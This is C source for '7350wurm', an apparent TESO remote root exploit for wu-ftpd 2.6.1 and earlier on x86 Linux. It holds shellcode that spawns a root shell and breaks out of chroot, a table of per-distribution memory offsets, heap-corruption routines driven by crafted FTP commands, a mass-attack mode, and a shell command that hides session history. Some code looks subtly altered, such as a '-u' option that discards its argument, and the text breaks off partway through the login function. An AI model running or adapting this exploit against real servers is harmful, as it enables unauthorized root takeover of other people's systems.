/* 7350wurm - x86/linux wu_ftpd remote root exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
*****************************************************************************
* thanks to bnuts, tomas, dvorak, scrippie and max for hints, discussions and
* ideas (synnergy.net rocks, thank you buddies ! :).
*/
#define VERSION "0.2.2"
/* TODO 1. fix chroot break on linux 2.4.x (x >= 13?)
* (ptrace inject on ppid())
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <time.h>
#define INIT_CMD "unset HISTFILE;id;uname -a;\n"
/* shellcodes
*/
unsigned char x86_lnx_loop[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\xfe";
/* x86/linux write/read/exec code (41 bytes)
* does: 1. write (1, "\nsP\n", 4);
* 2. read (0, ncode, 0xff);
* 3. jmp ncode
*/
unsigned char x86_wrx[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
"\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
"\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
"\x80\xeb\x05\xe8\xed\xff\xff\xff";
unsigned char x86_lnx_execve[] =
/* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
* code by lorian / teso
*/
"\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
"\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
"\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
"\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
"\x80"
/* 34 byte x86 linux argv code -sc
*/
"\xeb\x1b\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
"\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
"\xe1\xb0\x0b\xcd\x80\xe8\xe0\xff\xff\xff";
/* setreuid/chroot/execve
* lorian / teso */
unsigned char x86_lnx_shell[] =
/* TODO: fix chroot break on 2.4.x series (somewhere between 2.4.6 and
* 2.4.13 they changed chroot behaviour. maybe to ptrace-inject
* on parent process (inetd) and execute code there. (optional)
*/
"\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
"\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
"\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
"\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
"\x80"
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
typedef struct {
char * desc; /* distribution */
char * banner; /* ftp banner part */
unsigned char * shellcode;
unsigned int shellcode_len;
unsigned long int retloc; /* return address location */
unsigned long int cbuf; /* &cbuf[0] */
} tgt_type;
tgt_type tmanual = {
"manual values",
"unknown banner",
x86_wrx, sizeof (x86_wrx) - 1,
0x41414141, 0x42424242
};
tgt_type targets[] = {
{ "Caldera eDesktop|eServer|OpenLinux 2.3 update "
"[wu-ftpd-2.6.1-13OL.i386.rpm]",
"Version wu-2.6.1(1) Wed Nov 28 14:03:42 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e2b0, 0x080820a0 },
{ "Debian potato [wu-ftpd_2.6.0-3.deb]",
"Version wu-2.6.0(1) Tue Nov 30 19:12:53 CET 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db00, 0x0807f520 },
{ "Debian potato [wu-ftpd_2.6.0-5.1.deb]",
"Version wu-2.6.0(1) Fri Jun 23 08:07:11 CEST 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db80, 0x0807f5a0 },
{ "Debian potato [wu-ftpd_2.6.0-5.3.deb]",
"Version wu-2.6.0(1) Thu Feb 8 17:45:47 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db80, 0x0807f5a0 },
{ "Debian sid [wu-ftpd_2.6.1-5_i386.deb]",
"Version wu-2.6.1(1) Sat Feb 24 01:43:53 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e7a0, 0x0807ffe0 },
{ "Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]",
"Version wu-2.6.0(1) Thu May 25 03:35:34 PDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x080713e0, 0x08082e00 },
{ "Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]",
"Version wu-2.6.1(1) Mon Jan 29 08:04:31 PST 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x08072bd4, 0x08086400 },
{ "Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]",
"Version wu-2.6.1(1) Mon Jan 15 20:52:49 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f7f0, 0x08082600 },
{ "Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]",
"Version wu-2.6.1(1) Wed Jan 10 07:07:00 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x08071850, 0x08084660 },
{ "Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]",
"Version wu-2.6.1(1) Sun Sep 9 16:30:24 CEST 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806fec4, 0x08082b40 },
{ "RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jan 18 19:19:31 EST 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x08061cf0, 0x08068540 }, /* XXX: manually found */
{ "RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Aug 3 19:17:20 EDT 1998",
x86_wrx, sizeof (x86_wrx) - 1,
0x08061c48, 0x08068490 }, /* XXX: manually found */
{ "RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]",
"Version wu-2.6.0(1) Fri Jun 23 09:22:33 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806b530, 0x08076550 }, /* XXX: manually found */
#if 0
/* XXX: not exploitable using synnergy.net method. (glob code
* does not handle {.,.,.,.}
*/
{ "RedHat 6.0 (Hedwig) [wu-ftpd-2.4.2vr17-3.i386.rpm]",
"Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x08069f04, 0x08079f60 },
#endif
{ "RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]",
"Version wu-2.6.0(1) Thu Oct 21 12:27:00 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e620, 0x080803e0 },
{ "RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]",
"Version wu-2.6.0(1) Fri Jun 23 09:17:44 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x08070538, 0x08083360 },
{ "RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]",
"Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806cb88, 0x0807cc40 },
{ "RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]",
"Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e1a0, 0x0807fbc0 },
{ "RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]",
"Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x08070ddc, 0x08084600 },
{ "RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]",
"Version wu-2.6.1-16",
x86_wrx, sizeof (x86_wrx) - 1,
0x0807314c, 0x08085de0 },
{ "RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]",
"Version wu-2.6.1-18",
x86_wrx, sizeof (x86_wrx) - 1,
0x08072c30, 0x08085900 },
{ "SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]",
"Version wu-2.6.0(1) Wed Aug 30 22:26:16 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e6b4, 0x080800c0 },
{ "SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Wed Aug 30 22:26:37 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806989c, 0x08069f80 },
{ "SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]",
"Version wu-2.6.0(1) Thu Oct 28 23:35:06 GMT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f85c, 0x08081280 },
{ "SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]",
"Version wu-2.6.0(1) Mon Jun 26 13:11:34 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f4e0, 0x08080f00 },
{ "SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jun 26 13:11:56 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a234, 0x0806a880 },
{ "SuSE 7.0 [wuftpd.rpm]",
"Version wu-2.6.0(1) Wed Sep 20 23:52:03 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f180, 0x08080ba0 },
{ "SuSE 7.0 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Wed Sep 20 23:52:21 GMT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a554, 0x0806aba0 },
{ "SuSE 7.1 [wuftpd.rpm]",
"Version wu-2.6.0(1) Thu Mar 1 14:43:47 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f168, 0x08080980 },
{ "SuSE 7.1 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Thu Mar 1 14:44:08 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a534, 0x0806ab80 },
{ "SuSE 7.2 [wuftpd.rpm]",
"Version wu-2.6.0(1) Mon Jun 18 12:34:55 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f58c, 0x08080dc0 },
{ "SuSE 7.2 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Mon Jun 18 12:35:12 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a784, 0x0806ae40 },
{ "SuSE 7.3 [wuftpd.rpm]",
"Version wu-2.6.0(1) Thu Oct 25 03:14:33 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806f31c, 0x08080aa0 },
{ "SuSE 7.3 wu-2.4.2 [wuftpd.rpm]",
"Version wu-2.4.2-academ[BETA-18](1) "
"Thu Oct 25 03:14:49 GMT 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806a764, 0x0806ad60 },
#if 0
/* slackware (from 8 on they use proftpd by default) */
{ "Slackware 7",
"Version wu-2.6.0(1) Fri Oct 22 00:38:20 CDT 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806d03c, 0x0808f648 },
#endif
{ "Slackware 7.1",
"Version wu-2.6.0(1) Tue Jun 27 10:52:28 PDT 2000",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806ba2c, },
{ NULL, NULL, 0, 0, 0, 0 },
};
/* exploitation related stuff.
* DO NOT CHANGE, except you know exactly what you are doing.
*/
#define CHUNK_POS 256
#define MALLOC_ALIGN_MASK 0x07
#define MALLOC_MINSIZE 0x10
#define CHUNK_ALLSIZE(s) \
CHUNK_ROUND((s)) + 0x08
#define CHUNK_ROUND(s) \
(((((s) + 4 + MALLOC_ALIGN_MASK)) < \
(MALLOC_MINSIZE + MALLOC_ALIGN_MASK)) ? \
(MALLOC_MINSIZE) : ((((s) + 4 + MALLOC_ALIGN_MASK)) & \
~MALLOC_ALIGN_MASK))
/* minimum sized malloc(n) allocation that will jield in an overall
* chunk size of s. (s must be a valid %8=0 chunksize)
*/
#define CHUNK_ROUNDDOWN(s) \
((s) <= 0x8) ? (1) : ((s) - 0x04 - 11)
#define CHUNK_STRROUNDDOWN(s) \
(CHUNK_ROUNDDOWN ((s)) > 1 ? CHUNK_ROUNDDOWN ((s)) - 1 : 1)
/* FTP related stuff
*/
char * dest = "127.0.0.1"; /* can be changed with -d */
char * username = "ftp"; /* can be changed with -u */
char * password = "mozilla@"; /* can be changed with -p */
char * ftp_banner = NULL;
int verbose = 0;
/* FTP prototypes
*/
void ftp_escape (unsigned char *buf, unsigned long int buflen);
void ftp_recv_until (int sock, char *buff, int len, char *begin);
int ftp_login (char *host, char *user, char *pass);
/* main prototypes
*/
void usage (char *progname);
void exploit (int fd, tgt_type *tgt);
void shell (int sock);
void hexdump (char *desc, unsigned char *data, unsigned int amount);
void tgt_list (void);
tgt_type * tgt_frombanner (unsigned char *banner);
void xp_buildsize (int fd, unsigned char this_size_ls,
unsigned long int csize);
void xp_gapfill (int fd, int rnfr_num, int rnfr_size);
int xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len);
void xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen);
/*** MASS mode stuff
*/
static int
sc_build_x86_lnx (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv);
int mass = 0; /* enable with -m (kids, get hurt!) */
unsigned int mlen = 0;
unsigned char mcode[256];
/* imported from network.c
*/
#define NET_CONNTIMEOUT 60
#define NET_READTIMEOUT 20
int net_conntimeout = NET_CONNTIMEOUT;
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
void net_write (int fd, const char *str, ...);
int net_rtimeout (int fd, int sec);
int net_rlinet (int fd, char *buf, int bufsize, int sec);
/* exploitation related stuff, which is fixed on all wuftpd systems
*/
#define RNFR_SIZE 4
#define RNFR_NUM 73
int automode = 0; /* evil, do not use */
int debugmode = 0;
void
usage (char *progname)
{
fprintf (stderr, "usage: %s [-h] [-v] [-a] [-D] [-m]\n"
"\t[-t <num>] [-u <user>] [-p <pass>] [-d host]\n"
"\t[-L <retloc>] [-A <retaddr>]\n\n", progname);
fprintf (stderr,
"-h\tthis help\n"
"-v\tbe verbose (default: off, twice for greater effect)\n"
"-a\tAUTO mode (target from banner)\n"
"-D\tDEBUG mode (waits for keypresses)\n"
"-m\tenable mass mode (use with care)\n"
"-t num\tchoose target (0 for list, try -v or -v -v)\n"
"-u user\tusername to login to FTP (default: \"ftp\")\n"
"-p pass\tpassword to use (default: \"mozilla@\")\n"
"-d dest\tIP address or fqhn to connect to "
"(default: 127.0.0.1)\n"
"-L loc\toverride target-supplied retloc "
"(format: 0xdeadbeef)\n"
"-A addr\toverride target-supplied retaddr "
"(format: 0xcafebabe)\n");
fprintf (stderr, "\n");
exit (EXIT_FAILURE);
}
unsigned char * shellcode = NULL;
unsigned long int shellcode_len = 0;
unsigned long int user_retloc = 0,
user_retaddr = 0;
int
main (int argc, char *argv[])
{
char c;
char * progname; /* = argv[0] */
int fd;
tgt_type * tgt = NULL;
int tgt_num = -1;
unsigned char xpbuf[512 + 16];
fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
"(version "VERSION")\n"
"team teso (thx bnuts, tomas, synnergy.net !).\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
switch (c) {
case 'h':
usage (progname);
break;
case 'a':
automode = 1;
break;
case 'D':
debugmode = 1;
break;
case 'v':
verbose += 1;
break;
case 'm':
mass = 1;
break;
case 't':
if (sscanf (optarg, "%u", &tgt_num) != 1)
usage (progname);
break;
case 'u':
username = "h0ra";
printf ("username = %s\n", optarg);
break;
case 'p':
password = optarg;
break;
case 'd':
dest = optarg;
break;
case 'L':
if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
usage (progname);
break;
case 'A':
if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
usage (progname);
break;
default:
usage (progname);
break;
}
}
/* if both required offsets are given manually, then we dont have
* to require a target selection. otherwise check whether the target
* is within the list. if its not, then print a list of available
* targets
*/
if (user_retloc != 0 && user_retaddr != 0) {
tgt = &tmanual;
} else if (automode == 0 && (tgt_num == 0 ||
tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
{
if (tgt_num != 0)
printf ("WARNING: target out of list. list:\n\n");
tgt_list ();
exit (EXIT_SUCCESS);
}
if (tgt == NULL && automode == 0)
tgt = &targets[tgt_num - 1];
if (mass == 1) {
if ((argc - optind) == 0)
usage (progname);
mlen = sc_build_x86_lnx (mcode, sizeof (mcode),
x86_lnx_execve, &argv[optind]);
if (mlen >= 0xff) {
fprintf (stderr, "created argv-code too long "
"(%d bytes)\n", mlen);
exit (EXIT_FAILURE);
}
fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
}
printf ("# trying to log into %s with (%s/%s) ...", dest,
username, password);
fflush (stdout);
fd = ftp_login (dest, username, password);
if (fd <= 0) {
fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
exit (EXIT_FAILURE);
}
printf (" connected.\n");
if (debugmode) {
printf ("DEBUG: press enter\n");
getchar ();
}
printf ("# banner: %s", (ftp_banner == NULL) ? "???" :
ftp_banner);
if (tgt == NULL && automode) {
tgt = tgt_frombanner (ftp_banner);
if (tgt == NULL) {
printf ("# failed to jield target from banner, aborting\n");
exit (EXIT_FAILURE);
}
printf ("# successfully selected target from banner\n");
}
if (shellcode == NULL) {
shellcode = tgt->shellcode;
shellcode_len = tgt->shellcode_len;
}
if (verbose >= 2) {
printf ("using %lu byte shellcode:\n", shellcode_len);
hexdump ("shellcode", shellcode, shellcode_len);
}
if (user_retaddr != 0) {
fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
user_retaddr);
}
if (user_retloc != 0) {
fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
user_retloc);
tgt->retloc = user_retloc;
}
printf ("\n### TARGET: %s\n\n", tgt->desc);
/* real stuff starts from here
*/
printf ("# 1. filling memory gaps\n");
xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
exploit (fd, tgt);
printf ("# 3. triggering free(globlist[1])\n");
net_write (fd, "CWD ~{\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
if (strncmp (xpbuf, "sP", 2) != 0) {
fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n",
xpbuf);
exit (EXIT_FAILURE);
}
printf ("#\n# exploitation succeeded. sending real shellcode\n");
if (mass == 1) {
printf ("# mass mode, sending constructed argv code\n");
write (fd, mcode, mlen);
printf ("# send. sleeping 10 seconds\n");
sleep (10);
printf ("# success.\n");
exit (EXIT_SUCCESS);
}
printf ("# sending setreuid/chroot/execve shellcode\n");
net_write (fd, "%s", x86_lnx_shell);
printf ("# spawning shell\n");
printf ("##################################################"
"##########################\n");
write (fd, INIT_CMD, strlen (INIT_CMD));
shell (fd);
exit (EXIT_SUCCESS);
}
void
exploit (int fd, tgt_type *tgt)
{
unsigned long int dir_chunk_size,
bridge_dist,
padchunk_size,
fakechunk_size,
pad_before;
unsigned char * dl; /* dirlength */
unsigned char xpbuf[512 + 64];
/* figure out home directory length
*/
net_write (fd, "PWD\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "257 ");
dl = strchr (xpbuf, '"');
if (dl == NULL || strchr (dl + 1, '"') == NULL) {
fprintf (stderr, "faulty PWD reply: %s\n", xpbuf);
exit (EXIT_FAILURE);
}
dir_chunk_size = 0;
for (dl += 1 ; *dl != '"' ; ++dl)
dir_chunk_size += 1;
if (verbose)
printf ("PWD path (%lu): %s\n", dir_chunk_size, xpbuf);
/* compute chunk size from it (needed later)
*/
dir_chunk_size += 3; /* ~/ + NUL byte */
dir_chunk_size = CHUNK_ROUND (dir_chunk_size);
if (debugmode)
printf ("dir_chunk_size = 0x%08lx\n", dir_chunk_size);
/* send preparation buffer to store the fakechunk in the end of
* the malloc buffer allocated from within the parser ($1)
*/
printf ("# 2. sending bigbuf + fakechunk\n");
xp_build (tgt, xpbuf, 500 - strlen ("LIST "));
if (verbose)
hexdump ("xpbuf", xpbuf, strlen (xpbuf));
ftp_escape (xpbuf, sizeof (xpbuf));
net_write (fd, "CWD %s\n", xpbuf);
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "550 ");
/* synnergy.net uberleet method (thank you very much guys !)
*/
net_write (fd, "CWD ~/{.,.,.,.}\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
/* now, we flush the last-used-chunk marker in glibc malloc code. else
* we might land in a previously used bigger chunk, but we need a
* sequential order. "CWD ." will allocate a two byte chunk, which will
* be reused on any later small malloc.
*/
net_write (fd, "CWD .\n");
ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "250 ");
/* cause chunk with padding size
*/
pad_before = CHUNK_ALLSIZE (strlen ("~/{.,.,.,.}\n")) +
dir_chunk_size - 0x08;
xp_gapfill (fd, 1, CHUNK_ROUNDDOWN (pad_before));
/* 0x10 (CWD ~/{.,.,.,.}) + 4 * dirchunk */
bridge_dist = 0x10 + 4 * dir_chunk_size;
if (debugmode)
printf ("bridge_dist = 0x%08lx\n", bridge_dist);
/* 0x18 (RNFR 16), dcs (RNFR dir), 0x10 (CWD ~{) */
padchunk_size = bridge_dist - 0x18 - dir_chunk_size - 0x10;
if (debugmode)
printf ("padchunk_size = 0x%08lx\n", padchunk_size);
/* +4 = this_size field itself */
fakechunk_size = CHUNK_POS + 4;
fakechunk_size -= pad_before;
fakechunk_size += 0x04; /* account for prev_size, too */
fakechunk_size |= 0x1; /* set PREV_INUSE */
if (debugmode)
printf ("fakechunk_size = 0x%08lx\n", fakechunk_size);
xp_buildsize (fd, fakechunk_size, 0x10);
/* pad down to the minimum possible size in 8 byte alignment
*/
if (verbose)
printf ("\npadchunk_size = 0x%08lx\n==> %lu\n",
padchunk_size, padchunk_size - 8 - 1);
xp_gapfill (fd, 1, padchunk_size - 8 - 1);
if (debugmode) {
printf ("press enter\n");
getchar ();
}
return;
}
/* tgt_list
*
* give target list
*/
void
tgt_list (void)
{
int tgt_num;
printf ("num . description\n");
printf ("----+-----------------------------------------------"
"--------\n");
for (tgt_num = 0 ; targets[tgt_num].desc != NULL ; ++tgt_num) {
printf ("%3d | %s\n", tgt_num + 1, targets[tgt_num].desc);
if (verbose)
printf (" : %s\n", targets[tgt_num].banner);
if (verbose >= 2)
printf (" : retloc: 0x%08lx "
"cbuf: 0x%08lx\n",
targets[tgt_num].retloc,
targets[tgt_num].cbuf);
}
printf (" '\n");
return;
}
/* tgt_frombanner
*
* try to automatically select target from ftp banner
*
* return pointer to target structure on success
* return NULL on failure
*/
tgt_type *
tgt_frombanner (unsigned char *banner)
{
int tw; /* target list walker */
for (tw = 0 ; targets[tw].desc != NULL ; ++tw) {
if (strstr (banner, targets[tw].banner) != NULL)
return (&targets[tw]);
}
return (NULL);
}
/* xp_buildsize
*
* set chunksize to this_size_ls. do this in a csize bytes long chunk.
* normally csize = 0x10. csize is always a padded chunksize.
*/
void
xp_buildsize (int fd, unsigned char this_size_ls, unsigned long int csize)
{
int n,
cw; /* chunk walker */
unsigned char tmpbuf[512];
unsigned char * leet = "7350";
for (n = 2 ; n > 0 ; --n) {
memset (tmpbuf, '\0', sizeof (tmpbuf));
for (cw = 0 ; cw < (csize - 0x08) ; ++cw)
tmpbuf[cw] = leet[cw % 4];
tmpbuf[cw - 4 + n] = '\0';
if (debugmode)
printf (": CWD %s\n", tmpbuf);
net_write (fd, "CWD %s\n", tmpbuf);
ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
}
memset (tmpbuf, '\0', sizeof (tmpbuf));
for (cw = 0 ; cw < (csize - 0x08 - 0x04) ; ++cw)
tmpbuf[cw] = leet[cw % 4];
if (debugmode)
printf ("| CWD %s\n", tmpbuf);
net_write (fd, "CWD %s%c\n", tmpbuf, this_size_ls);
ftp_recv_until (fd, tmpbuf, sizeof (tmpbuf), "550 ");
/* send a minimum-sized malloc request that will allocate a chunk
* with 'csize' overall bytes
*/
xp_gapfill (fd, 1, CHUNK_STRROUNDDOWN (csize));
return;
}
/* xp_gapfill
*
* fill all small memory gaps in wuftpd malloc space. do this by sending
* rnfr requests which cause a memleak in wuftpd.
*
* return in any case
*/
void
xp_gapfill (int fd, int rnfr_num, int rnfr_size)
{
int n;
unsigned char * rb; /* rnfr buffer */
unsigned char * rbw; /* rnfr buffer walker */
unsigned char rcv_buf[512]; /* temporary receive buffer */
if (debugmode)
printf ("RNFR: %d x 0x%08x (%d)\n",
rnfr_num, rnfr_size, rnfr_size);
rbw = rb = calloc (1, rnfr_size + 6);
strcpy (rbw, "RNFR ");
rbw += strlen (rbw);
/* append a string of "././././". since wuftpd only checks whether
* the pathname is lstat'able, it will go through without any problems
*/
for (n = 0 ; n < rnfr_size ; ++n)
strcat (rbw, ((n % 2) == 0) ? "." : "/");
strcat (rbw, "\n");
for (n = 0 ; n < rnfr_num; ++n) {
net_write (fd, "%s", rb);
ftp_recv_until (fd, rcv_buf, sizeof (rcv_buf), "350 ");
}
free (rb);
return;
}
#define ADDR_STORE(ptr,addr){\
((unsigned char *) (ptr))[0] = (addr) & 0xff;\
((unsigned char *) (ptr))[1] = ((addr) >> 8) & 0xff;\
((unsigned char *) (ptr))[2] = ((addr) >> 16) & 0xff;\
((unsigned char *) (ptr))[3] = ((addr) >> 24) & 0xff;\
}
int
xp_build (tgt_type *tgt, unsigned char *buf, unsigned long int buf_len)
{
unsigned char * wl;
memset (buf, '\0', buf_len);
memset (buf, '0', CHUNK_POS);
xp_buildchunk (tgt, buf + CHUNK_POS, buf_len - CHUNK_POS - 1);
for (wl = buf + strlen (buf) ; wl < &buf[buf_len - 1] ; wl += 2) {
wl[0] = '\xeb';
wl[1] = '\x0c';
}
memcpy (&buf[buf_len - 1] - shellcode_len, shellcode,
shellcode_len);
return (strlen (buf));
}
/* xp_buildchunk
*
* build the fake malloc chunk that will overwrite retloc with retaddr
*/
void
xp_buildchunk (tgt_type *tgt, unsigned char *cspace, unsigned int clen)
{
unsigned long int retaddr_eff; /* effective */
if (user_retaddr)
retaddr_eff = user_retaddr;
else
retaddr_eff = tgt->cbuf + 512 - shellcode_len - 16;
fprintf (stderr, "\tbuilding chunk: ([0x%08lx] = 0x%08lx) in %d bytes\n",
tgt->retloc, retaddr_eff, clen);
/* easy, straight forward technique
*/
ADDR_STORE (&cspace[0], 0xfffffff0); /* prev_size */
ADDR_STORE (&cspace[4], 0xfffffffc); /* this_size */
ADDR_STORE (&cspace[8], tgt->retloc - 12); /* fd */
ADDR_STORE (&cspace[12], retaddr_eff); /* bk */
return;
}
void
shell (int sock)
{
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
perror ("read user");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("connection closed by foreign host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
perror ("read remote");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
/*** FTP functions
*/
/* FTP is TELNET is SHIT.
*/
void
ftp_escape (unsigned char *buf, unsigned long int buflen)
{
unsigned char * obuf = buf;
for ( ; *buf != '\0' ; ++buf) {
if (*buf == 0xff &&
(((buf - obuf) + strlen (buf) + 1) < buflen))
{
memmove (buf + 1, buf, strlen (buf) + 1);
buf += 1;
}
}
}
void
ftp_recv_until (int sock, char *buff, int len, char *begin)
{
char dbuff[2048];
if (buff == NULL) {
buff = dbuff;
len = sizeof (dbuff);
}
do {
memset (buff, '\x00', len);
if (net_rlinet (sock, buff, len - 1, 20) <= 0)
return;
} while (memcmp (buff, begin, strlen (begin)) != 0);
return;
}
int
ftp_login (char *host, char *user, char *pass)
{
int ftpsock;
char resp[512];
ftpsock = net_connect (NULL, host, 21, 30);
if (ftpsock <= 0)
return (0);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
/* handle multiline pre-login stuff (rfc violation !)
*/
if (memcmp (resp, "220-", 4) == 0)
ftp_recv_until (ftpsock, resp, sizeof (resp), "220 ");
